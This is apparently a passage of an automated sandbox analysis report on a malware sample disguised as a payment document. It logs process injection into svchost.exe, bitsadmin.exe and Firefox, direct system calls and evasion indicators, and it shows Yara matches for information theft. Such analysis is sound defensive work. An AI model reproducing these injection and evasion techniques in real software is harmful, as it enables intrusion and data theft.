Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h] | 2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h] | 2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h] | 2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h] | 2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h] | 2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h] | 2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h] | 2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h] | 2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h] | 2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h] | 2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h] | 2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h] | 2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h] | 2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h] | 2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h] | 2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h] | 2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h] | 2_2_034DEA60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h] | 2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h] | 2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h] | 2_2_034BCA11
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h] | 2_2_0346CA24
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h] | 2_2_0345EA2E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h] | 2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h] | 2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h] | 2_2_0346CA38
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h] | 2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h] | 2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h] | 2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03430AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h] | 2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h] | 2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h] | 2_2_03504A80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h] | 2_2_03468A90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h] | 2_2_03486AA4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h] | 2_2_034B0946
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03504940 mov eax, dword ptr fs:[00000030h] | 2_2_03504940
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h] | 2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h] | 2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h] | 2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h] | 2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E mov edx, dword ptr fs:[00000030h] | 2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h] | 2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h] | 2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h] | 2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h] | 2_2_034BC97C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h] | 2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h] | 2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h] | 2_2_034BC912
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h] | 2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h] | 2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B892A mov eax, dword ptr fs:[00000030h] | 2_2_034B892A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C892B mov eax, dword ptr fs:[00000030h] | 2_2_034C892B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h] | 2_2_034C69C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h] | 2_2_034649D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h] | 2_2_034FA9D3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h] | 2_2_034BE9E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h] | 2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h] | 2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] | 2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] | 2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] | 2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] | 2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] | 2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] | 2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] | 2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] | 2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] | 2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] | 2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] | 2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] | 2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h] | 2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h] | 2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h] | 2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h] | 2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h] | 2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h] | 2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h] | 2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h] | 2_2_03460854
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h] | 2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h] | 2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h] | 2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h] | 2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h] | 2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h] | 2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h] | 2_2_034BC810
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h] | 2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h] | 2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h] | 2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h] | 2_2_03452835
Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005B80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, | 0_2_005B80A9
Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_0058A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_0058A155
Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_0058A124 SetUnhandledExceptionFilter, | 0_2_0058A124

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtOpenKeyEx: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtTerminateThread: Direct from: 0x77382FCC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtQueryValueKey: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe | NtProtectVirtualMemory: Direct from: 0x77377B2E
Source: C:\Users\user\Desktop\Latest advice payment.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread register set: target process: 7324Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeThread APC queued: target process: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeJump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7A6008Jump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005B87B1 LogonUserW,0_2_005B87B1
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00563B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00563B3A
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_005648D7
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005C4C53 mouse_event,0_2_005C4C53
                Source: C:\Users\user\Desktop\Latest advice payment.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Latest advice payment.exe"Jump to behavior
                Source: C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005B7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_005B7CAF
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005B874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_005B874B
                Source: Latest advice payment.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: CWtKbasqHVKAO.exe, 00000007.00000002.3990989092.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000000.2350542674.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000002.3991207825.0000000001941000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: Latest advice payment.exe, CWtKbasqHVKAO.exe, 00000007.00000002.3990989092.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000000.2350542674.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000002.3991207825.0000000001941000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: CWtKbasqHVKAO.exe, 00000007.00000002.3990989092.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000000.2350542674.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000002.3991207825.0000000001941000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: CWtKbasqHVKAO.exe, 00000007.00000002.3990989092.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 00000007.00000000.2350542674.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp, CWtKbasqHVKAO.exe, 0000000C.00000002.3991207825.0000000001941000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_0058862B cpuid 0_2_0058862B
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00594E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00594E87
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005A1E06 GetUserNameW,0_2_005A1E06
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_00593F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00593F3A
                Source: C:\Users\user\Desktop\Latest advice payment.exeCode function: 0_2_005649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005649A0

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.2433911205.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2435582129.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3993071436.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3990417322.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3991350388.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3990055319.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3990341919.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
